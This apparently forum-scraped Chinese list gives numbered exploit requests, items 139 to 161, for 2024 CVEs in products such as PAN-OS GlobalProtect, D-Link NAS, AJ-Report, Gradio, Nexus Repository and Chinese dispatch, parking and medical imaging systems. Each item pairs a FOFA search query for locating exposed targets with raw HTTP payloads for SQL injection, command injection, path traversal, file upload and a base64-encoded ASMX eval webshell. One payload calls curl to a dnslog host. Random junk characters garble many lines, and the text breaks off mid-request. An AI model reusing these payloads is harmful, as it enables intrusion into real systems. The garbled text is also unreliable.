Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ k8 L9 B; G, ], r
Accept-Encoding: gzip, deflate, br; E5 K3 E6 F' p0 P" E
Connection: close
! T8 U8 p- [3 H" P. m4 xUpgrade-Insecure-Requests: 15 a Y3 U: X. o
- Q- J4 Q6 U; K6 t
# S4 P P) Y' g139. 福建科立讯通信指挥调度平台editemedia.php sql注入) V9 g/ Q' d0 Y1 ^3 }+ T
CVE-2024-2622% O( M& c6 o1 {' a# [4 f5 Q* |) ?9 ~
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
1 s% d i8 M! I, i! I7 D# @3 AGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.18 S; Y0 v6 ~+ U9 {. z1 R! L
Host: x.x.x.x
6 ], Q0 r' P/ z$ s" }( h! _9 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 @* u& J+ Z7 A3 V' a, f" B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 w: Q; V. a) n3 \* @+ V4 y% ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
~: r. B0 ]8 f2 U6 z' v; C# m+ lAccept-Encoding: gzip, deflate, br
2 u, ^7 s7 y3 S( L, U* wConnection: close& D* o4 ?5 F5 h t
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
( m; }0 ?3 e! p% X% V, V% ZUpgrade-Insecure-Requests: 1
' L. L8 N+ P+ ]1 |9 n
% u7 J& ~5 D! @8 m+ p1 U8 o9 a. p0 M4 g n. F
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入3 K: ] a) j# d# `) D# z
CVE-2024-2566" U, I1 h' L) b4 {: c
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
( c4 E/ Q# H* G3 k% d8 g# S3 UGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
! E" |- @) R4 j$ Z1 t0 ZHost: x.x.x.x
$ i1 U; m7 B6 S2 Z+ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; q" _! L( F$ ]$ @5 H/ a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 N1 {8 E: Z/ g5 N( [+ W+ a$ l" y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# M, V# O; s/ j0 e7 zAccept-Encoding: gzip, deflate, br
. ?" J( P) A& Q; }0 `Connection: close
( _9 x% j( P7 A9 KCookie: authcode=h8g9
% j2 S" n( R; {Upgrade-Insecure-Requests: 1
. E! [ c9 C0 s6 Z. o* T* _7 n* Z. O& l+ |8 f
' |! i w8 @+ H3 t141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入$ t% ^8 v) }8 |. @7 w) M
FOFA:body="指挥调度管理平台"5 ]$ G, m$ j# e/ n& ~" C8 t; s$ k
POST /app/ext/ajax_users.php HTTP/1.19 R$ o- \ @ ?4 \
Host: your-ip- H% S* I# y8 q& P5 ]8 V
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info! [* Z& d3 B+ A4 J6 z8 Z
Content-Type: application/x-www-form-urlencoded
- T' Z; W" d5 u
z5 ?- [ k7 {* Q2 e5 ?2 S, c. Z V1 H; s) B3 \
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
* p; Q3 Q: b8 y+ s# r& z0 K# @* V7 K) ?
3 \$ S" D% W; U3 n9 ]142. CMSV6车辆监控平台系统中存在弱密码
0 p) A9 l4 Q) e- z e6 ?" Z" p' KCVE-2024-29666
4 E3 t0 L0 s ^( ZFOFA:body="/808gps/"- C& k8 }; ]/ \) ^! m
admin/admin" U: ^0 P u, j/ h8 U
143. Netis WF2780 v2.1.40144 远程命令执行
' K" c7 n- v, t% Y' S- cCVE-2024-258502 Z: ~( j( P2 A5 T4 v. y: d( ?
FOFA:title='AP setup' && header='netis'% w }7 d& e( y0 t1 I
PAYLOAD
: ~' ^. ]$ R$ V4 Y" l5 X% T0 o3 [+ D$ R
144. D-Link nas_sharing.cgi 命令注入, F( a8 e6 H3 w |
FOFA:app="D_Link-DNS-ShareCenter"8 {% e5 J8 |+ h" Y2 P& t
system参数用于传要执行的命令
4 \" L5 G; K4 D3 |5 PGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1% c* M7 s& M, g9 ~1 x P: P
Host: x.x.x.x0 T& O2 |. H; ]; R
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.02 O4 y- A- h; x w
Connection: close$ M7 k6 @6 a Z" Y9 o4 L+ l, L7 P
Accept: */*
% H) }7 ~7 G6 Y3 Z5 e: `! YAccept-Language: en- j/ s" z; C" C+ T+ F
Accept-Encoding: gzip
) ~& U- M- ]3 g0 e( j6 W
. @3 w4 p. y6 ^9 @" _! X
- W$ ^' F( o" K! f j145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
/ n& h" N3 ^2 I3 hCVE-2024-3400 ?! J [+ b; _; h8 a5 W- ?
FOFA:icon_hash="-631559155"
# h: [0 M7 @$ RGET /global-protect/login.esp HTTP/1.1
8 C6 B i5 e8 R* Q* bHost: 192.168.30.112:1005
7 E$ @) q0 d7 H" R$ X2 u3 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' Y' c( W. v+ ~7 JConnection: close
% V9 E9 o$ N4 c, `+ PCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;& o" o$ C4 f) L
Accept-Encoding: gzip ~+ e7 r! ?: e; L8 a
3 ?3 U6 X) S. ]- j, U$ l
: Y+ Y% v* c5 ^# {" y& b2 X146. MajorDoMo thumb.php 未授权远程代码执行3 B" t N9 N# w* u2 F1 O9 h, h
CNVD-2024-02175- Q, w" @& |. l6 X# m: v
FOFA:app="MajordomoSL"# G$ ~ w; T$ A# q! A2 _: t. F
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.11 P# }; t1 y. B0 \5 b- `
Host: x.x.x.x; V6 P+ S$ Y# g! O( T3 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
; i8 N4 q* C' @5 A* w1 K8 BAccept-Charset: utf-83 e8 l0 J* l/ n. Y
Accept-Encoding: gzip, deflate
4 p' J* M* [3 iConnection: close8 x* U- w! V6 Y4 W; I) v2 w
% v2 [, x# |5 K* M
4 [5 s3 u; \0 t( z
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
/ j9 m7 C$ _( O: ?CVE-2024-32399
2 S7 j7 y7 Q( Y" j$ l/ xFOFA:body="RaidenMAILD"9 U0 q' ?% ^/ x
GET /webeditor/../../../windows/win.ini HTTP/1.1
" w% r: |. ]3 lHost: 127.0.0.1:813 \ V1 J2 i/ v9 K; i
Cache-Control: max-age=07 w2 ]/ F% c, K' W' H
Connection: close
2 R$ [6 w% A- ]1 L) V V1 i: p5 h3 x9 g* y- Q* s
$ ^6 B! _- {$ n. \9 a' X2 ~2 E148. CrushFTP 认证绕过模板注入+ k; M9 [9 l2 L0 g& D1 D' `
CVE-2024-4040; g0 R- Y: ?" |# a0 t6 R, v
FOFA:body="CrushFTP"
`- u9 ^) w1 N ]/ h$ LPAYLOAD
! J) ^2 r: f; G. G8 X5 A. {' j( v. t( h- a k" |; \
149. AJ-Report开源数据大屏存在远程命令执行8 p# j) X5 a& y
FOFA:title="AJ-Report"
3 Z3 m" v% L$ {1 h+ j: j% H$ F7 K
POST /dataSetParam/verification;swagger-ui/ HTTP/1.10 b& u5 s( ?- i" a
Host: x.x.x.x& h. }7 @7 o, ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" T1 K) S7 e- D: R& _+ e8 C: y7 t, @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 p+ m1 y6 z$ @; ]' N5 p+ wAccept-Encoding: gzip, deflate, br8 |7 w x+ M3 O
Accept-Language: zh-CN,zh;q=0.9% Y9 D3 X- T1 K3 ^
Content-Type: application/json;charset=UTF-8
5 ]1 E, I$ N! l, D1 JConnection: close
% D) i9 d1 @5 F% d1 ~3 \5 Z7 q9 `% W. @& q& C: P$ G
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
. w- ]; ?* M1 R, Z! H) l r! [5 ]* ?% k
150. AJ-Report 1.4.0 认证绕过与远程代码执行, d+ l R1 r$ U: E- c0 `2 i8 V2 g m
FOFA:title="AJ-Report"
/ C9 q1 m) `/ V/ T- F6 ?- Z" oPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1+ K4 V- y3 p; H+ w: j7 M3 \) ~
Host: x.x.x.x1 I' ^' J% i8 |" X, B/ F4 R. d, ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 U: Q. ^; y+ N, c. D/ PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& I0 P+ N* \- S8 P' ?/ Z! eAccept-Encoding: gzip, deflate, br
6 V$ C S$ p7 X0 N) v/ R; Z' jAccept-Language: zh-CN,zh;q=0.9 n; m7 ~- K/ \ |, y; z, ]& E
Content-Type: application/json;charset=UTF-8
/ c! x( U6 ~0 ?4 t9 FConnection: close- U: a; I' S5 |) ]' B7 g
Content-Length: 339$ O/ G' Q" \3 L) T" ^' E
) |2 f. d/ s4 L% g; y8 C9 | u{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
$ z# Q7 ~$ g, L) R0 k( g' o2 z& C" y: j
: a' w( r2 D1 q% k% u! g151. AJ-Report 1.4.1 pageList sql注入
$ ^$ H$ X; T0 ~) Z/ PFOFA:title="AJ-Report"0 |& \. f. Q! L/ u
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1* E0 W, H1 T4 Q
Host: x.x.x.x
; _6 ^% G) [8 z' e) {8 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. q6 w' o' A3 s1 z5 V! j, ]
Connection: close
4 x1 c( r2 U) l- d% `% x! L& ]Accept-Encoding: gzip
" q: ?) o3 [; ]2 ^5 p/ G4 U6 o, ^# f; d, k R- E& x' T3 h
3 e* I/ {# l4 G. T
152. Progress Kemp LoadMaster 远程命令执行
1 n) K5 f- x8 l aCVE-2024-1212
( t8 ~& e7 S$ |' U* J( j5 w; r& F: HLoadMaster <= 7.2.59.2 (GA)
+ \4 Y! o/ u: H7 `$ l( ?5 I' T1 aLoadMaster<=7.2.54.8 (LTSF)* n. E3 _) L' y7 J8 d2 ^$ c/ C
LoadMaster <= 7.2.48.10 (LTS)- ~6 q/ L6 n, k$ \, f- ~
FOFA:body="LoadMaster"2 q u$ O. W- c/ E% S* m+ n. C" O
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码9 y4 j7 j" c) m6 y" R
GET /access/set?param=enableapi&value=1 HTTP/1.1( Q( I# t* J) O% P8 P% e s: V
Host: x.x.x.x
) G* t3 {, U' x, v3 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.14 M. E2 [0 p: e+ [* d/ R
Connection: close
* F: A- O7 i) @! gAccept: */*' k R+ O! z$ }: R* L$ Q
Accept-Language: en
" i* T5 L( c6 c1 H% a7 @Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
% y% M7 ]% Z" {2 H, H. K) GAccept-Encoding: gzip
! h/ e9 O" J* l! q. Q& X8 n+ H( x# i- G9 ^! l/ a
6 b, l* W" j/ V3 j153. gradio任意文件读取9 R; a3 Y: E/ l# X" V# G
CVE-2024-1561FOFA:body="__gradio_mode__"; n' ^/ {: {- w* z; g, J: `
第一步,请求/config文件获取componets的id
* t4 C8 ?* y X% W9 P8 t6 zhttp://x.x.x.x/config
& ]+ u" t% t1 T. E
0 w( t, c, x4 ?' W! y8 C; Z1 i
5 b+ |# j- J" P+ P# d第二步,将/etc/passwd的内容写入到一个临时文件
2 [. T, m/ `) W ^( XPOST /component_server HTTP/1.1: Y: P* s9 {& Z! q% F1 `
Host: x.x.x.x
1 J4 N% R5 d% k# a- Z5 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
! \# ^( }& u$ L9 p; W1 JConnection: close
% [4 D4 q" u7 c4 w$ y5 I6 o& v r5 VContent-Length: 1156 {" i+ m: ]' e3 g2 z- d( ]
Content-Type: application/json8 p3 M: C/ c* T2 K& u& `& _) C
Accept-Encoding: gzip0 @$ k5 { A" O- M: m
/ {! g2 F) {! H! @: M/ B
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
2 F: {7 ~% G+ l# R% @8 U: C
5 D/ l6 S7 K/ T
4 J/ Y! B; Y2 ~1 \, a第三步访问
# U B# f; i" M: ihttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd2 V8 v5 U. X: r) K) ] ~
% N2 u- ?* l$ f7 w; J$ p
3 L: ]6 [" [- g" R' B; @8 C154. 天维尔消防救援作战调度平台 SQL注入! W# M+ f3 a5 C: y: J9 Q
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"2 q' _/ r8 e3 ^1 Y7 @" P; r" Y$ ?
POST /twms-service-mfs/mfsNotice/page HTTP/1.13 M, {1 C! [' U* Q% v6 ?5 u
Host: x.x.x.x
# e9 B2 h) Y2 I; O1 d5 H: h3 pContent-Length: 106% s' p9 q" h) [1 P ]
Cache-Control: max-age=0 ^. X. G. a4 N) q
Upgrade-Insecure-Requests: 1, h& \ _* z, H* C( R: u
Origin: http://x.x.x.x
4 q* F. V4 i e. JContent-Type: application/json3 {; [( G1 D" d% P2 v4 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.364 a1 k" v4 {3 v" X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 {0 M% d3 O* t3 GReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
8 [1 p* Y1 H! u* dAccept-Encoding: gzip, deflate
' Q# [; M3 I3 T0 o& m7 ?Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
4 q4 j4 b/ L# OConnection: close4 g+ z# j- F5 | N
6 _$ Q( ~0 S+ H. S! \9 t: d* N{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
& ]3 H8 M8 [; W( _+ H5 p" x4 O3 ^ G
2 E, Z, t1 `7 J2 w/ Y8 z. t& ]* c! U9 n0 H7 r* s$ {( B
155. 六零导航页 file.php 任意文件上传8 R+ z% T3 _- g6 j3 {
CVE-2024-34982* q V$ y2 ^) B: `
FOFA:title=="上网导航 - LyLme Spage"
6 a: O6 t; y8 c k% P% g7 W+ ]POST /include/file.php HTTP/1.1
/ r5 U4 e& N4 K" @; dHost: x.x.x.x7 {% ]; J H0 z' x$ Y, n/ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.02 {. X; @8 d1 G' T
Connection: close
Z' G- D+ l, n0 H; YContent-Length: 232$ D( L. I0 q2 ^! X9 z. ~+ H4 i
Accept: application/json, text/javascript, */*; q=0.01
$ S1 ?; F+ z k. s* \Accept-Encoding: gzip, deflate, br
W% r. P6 N. [1 @2 p6 y! C4 V% D& xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; `4 `8 W8 n6 F$ k4 {
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f1 {: V( f! W* y: Z5 o
X-Requested-With: XMLHttpRequest
+ c: T9 j( }5 @ B& W+ K! X
7 G5 [; f- n4 u! B- s# u, X-----------------------------qttl7vemrsold314zg0f+ n! A. a9 t" X+ b. v7 A
Content-Disposition: form-data; name="file"; filename="test.php"# S+ I- v' D5 ]
Content-Type: image/png7 g& S2 P9 O+ t5 Y4 E/ f
2 A/ a+ w' V0 n! `, v$ _7 ]; \6 ]<?php phpinfo();unlink(__FILE__);?>
- o! A* n# Q; g2 X$ t, H& M2 ~-----------------------------qttl7vemrsold314zg0f--0 Q$ d9 j$ ^0 R' X- O+ F2 j
# g; K8 r! Y+ ?7 Z
" Z. Q, t+ S8 w
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php( y' C% y: N& ^
4 K- @) s4 P3 |5 c0 P8 _
156. TBK DVR-4104/DVR-4216 操作系统命令注入
8 A& I" w3 W1 N" `% f# f, t [CVE-2024-37215 n8 i* h7 a# ~* u0 V/ G$ I( Y
FOFA:"Location: /login.rsp"2 f+ @5 ?8 H1 f; x
·TBK DVR-4104
5 _) H: C3 B9 X9 s2 K- N# U·TBK DVR-4216
; a3 b" T# r$ @: ccurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
8 s' n4 A4 n0 H1 I, o& l) y9 r
) {, y: s, P# x
; D! M% |- H# w" lPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1/ U, X; o6 }9 E8 m, D. ?
Host: x.x.x.x4 g% C/ T" \# W9 h% q$ @: p" F& m
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* t2 c9 N- @! w" V/ Y' h, l4 g# HConnection: close
# M; |( z8 `4 e& iContent-Length: 0
9 k* |! x8 C3 E. fCookie: uid=1" Z7 j* j% x. e) H
Accept-Encoding: gzip6 ~+ t7 V3 R& J( e j# O
& N: `; @; ?8 b# L( E/ o
' ?5 ?* c0 U7 ^7 {. J d/ |157. 美特CRM upload.jsp 任意文件上传
! M1 O1 y$ A1 p% O" QCNVD-2023-06971
4 t! f' s, T* u. V% n- y t+ \FOFA:body="/common/scripts/basic.js"
4 ^5 G3 p* I9 RPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
* Z7 P+ j7 h# N' c' u5 \Host: x.x.x.x
- H- R |4 [2 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
4 |3 K' p- W$ KContent-Length: 709
7 Y+ c' U- ?: y- r$ x/ i% eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' `% I- s9 J' vAccept-Encoding: gzip, deflate( t6 A g, s- y
Accept-Language: zh-CN,zh;q=0.9) ^+ v# y# ^" r8 P+ N4 P; l
Cache-Control: max-age=0
7 F" ]$ W: l9 Z% ?" @6 yConnection: close
' E3 D! K1 S" q# YContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
: T! u x/ ~' Y$ E0 V% aUpgrade-Insecure-Requests: 1, R6 [+ v$ Z' M/ |+ ?
% U1 x# j/ S) w' h$ `
------WebKitFormBoundary1imovELzPsfzp5dN
% H4 k8 k8 k+ O6 y* Q3 F1 {2 GContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
. e- X# ?* ~# o- l+ bContent-Type: application/octet-stream2 g) n2 C2 V7 n, U$ F$ p& k# e
* r! z; j+ k3 o( Anyhelxrutzwhrsvsrafb, H H; [7 _1 L5 }5 z
------WebKitFormBoundary1imovELzPsfzp5dN8 t) W( ~4 i, H0 m. t! `; q) k! _( E z( f
Content-Disposition: form-data; name="key"
6 W3 Y2 |6 f: p
0 h0 w; z9 X$ Tnull
7 ^8 F, F% D9 V------WebKitFormBoundary1imovELzPsfzp5dN6 U& r/ N- I( F
Content-Disposition: form-data; name="form"
3 ]0 H. f: r3 _) R# W- L5 `2 B" E" Y* j$ e% c, e% P
null
: q. j) D- W7 L9 ]------WebKitFormBoundary1imovELzPsfzp5dN: T, D% I# o$ _) `! g9 ?
Content-Disposition: form-data; name="field"' q6 o& y" S4 I/ }! b; S9 J! W8 B
Z9 y# w2 j) c( q
null4 D5 z% _# H% j# e$ H1 R
------WebKitFormBoundary1imovELzPsfzp5dN) z" [& i6 i2 w9 z% J
Content-Disposition: form-data; name="filetitile"5 n6 [- ~9 M! C9 S" g- O
. n A' P+ ^4 S9 q" |* o- [
null( B/ _6 a) u7 h" t9 L
------WebKitFormBoundary1imovELzPsfzp5dN
3 u9 y8 [9 E+ a$ @ S+ @! bContent-Disposition: form-data; name="filefolder"% k0 |# [$ ]( f1 E2 b/ g
! f* |; N$ Z' a+ Xnull
- X" u7 o/ K9 C------WebKitFormBoundary1imovELzPsfzp5dN--4 @+ i7 R( r7 p
3 P, d& v' T8 j8 J% |+ y
1 Q( z2 l2 B1 m# W- r2 x8 b8 thttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp2 A( N! f5 l1 J+ b8 E- x4 F
( a! `4 {$ }! e" r/ v
158. Mura-CMS-processAsyncObject存在SQL注入
Y8 x b$ c3 \- U3 n% V2 YCVE-2024-32640
0 n+ t7 G( L8 U2 wFOFA:"Generator: Masa CMS"' d- s5 P+ Y2 b2 v
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
) c* A( y% I* e) UHost: {{Hostname}}1 s. {; v B7 U H
Content-Type: application/x-www-form-urlencoded7 i' | N1 `; v, ?' t. u0 T
8 J3 P3 M6 Z) t) X
object=displayregion&contenthistid=x\'&previewid=1
- a. L; @/ ~( L: M8 _+ T- t* X! z/ K* H+ Y8 C- w
6 x* n* U: t5 l1 V
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
3 L# ] M* {5 `, @9 aFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")0 [: R S3 X9 z, E
POST /webservices/WebJobUpload.asmx HTTP/1.1
; c! K" f! n5 b6 X% ]Host: x.x.x.x
* J0 h& E7 b; f1 D( }( v1 j6 P; f ]+ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
, l+ @% [7 V/ `$ _% A- |* a) aContent-Length: 1080
% i/ j; v. Y# ~5 |8 WAccept-Encoding: gzip, deflate
& A+ s, v; F o1 @) _0 h8 K: jConnection: close1 F) z; l+ F% \
Content-Type: text/xml; charset=utf-84 J1 A5 {& y4 X$ o p
Soapaction: "http://rainier/jobUpload"0 d$ E, W' x( j0 V9 p
" y# X& H& i' Q5 s2 C3 j+ ^" e4 z+ z<?xml version="1.0" encoding="utf-8"?>
2 r, c( X4 Y+ S8 j7 D<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">8 X f5 F5 w' o/ K
<soap:Body>4 w' v& g- K* y6 L+ r' s
<jobUpload xmlns="http://rainier">
' ?. a/ e" L& J! `( T7 x7 [<vcode>1</vcode>
+ c& u1 j! ?- h6 x5 \2 `) f4 X<subFolder></subFolder>
+ a. m; @ _ j9 `- B<fileName>abcrce.asmx</fileName># @! H! T1 K' P7 J+ d
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
1 p, f0 t) _7 f</jobUpload>) x1 H" B% o: U- W* E4 O! @& D
</soap:Body>
7 k. U# O# E( x n! E) U! X</soap:Envelope>
; i; o6 d" E1 A) K/ d" d! Q: H
+ p2 K+ F, O& N4 Q; E8 w' ?0 H( v7 [8 h& d
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
# g5 c; K1 \+ ]& _! A8 G
0 L7 L8 k% \3 H; C( O1 _ O( k: @+ l
* r L7 T W' I160. Sonatype Nexus Repository 3目录遍历与文件读取6 d: V/ W8 p( V9 I2 }0 S
CVE-2024-4956! o$ m! ?3 t u
FOFA:title="Nexus Repository Manager"$ q4 E9 ]5 u( n' C% e
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1# H& e, F+ I& i. _+ X5 j: Q
Host: x.x.x.x
2 h0 w# q: |8 y4 W0 D$ K+ RUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0$ q& r! v' J" |
Connection: close* x. @& r; ]) o9 g/ ~
Accept: */*, G1 e" j& s/ o9 o5 U
Accept-Language: en6 u2 E7 E+ |7 z# M9 q. ^$ _
Accept-Encoding: gzip+ {# {- x1 Q0 s. o
+ ?5 V7 b3 M1 T- w$ Z, P5 m3 |
$ `' s2 v4 ^! o/ h161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 f% P' ^! K! aFOFA:body="/KT_Css/qd_defaul.css"+ H: w* h+ N9 x) i1 Y9 y" @
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
O9 F& I1 C8 L' a, zPOST /Webservice.asmx HTTP/1.1$ ^! ^+ W8 t* Y3 K, ` H' Q
Host: x.x.x.x' B6 V+ L' l# h8 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36+ c; }% B4 f1 F% l$ z
Connection: close
" z$ `- u" [. K6 n6 c$ uContent-Length: 445, U2 `7 i& g; G( P8 m
Content-Type: text/xml
: ]) l+ s8 V* a3 p% zAccept-Encoding: gzip6 p) L* k. @6 |- ~, C4 J" ~. F7 n6 ^, o
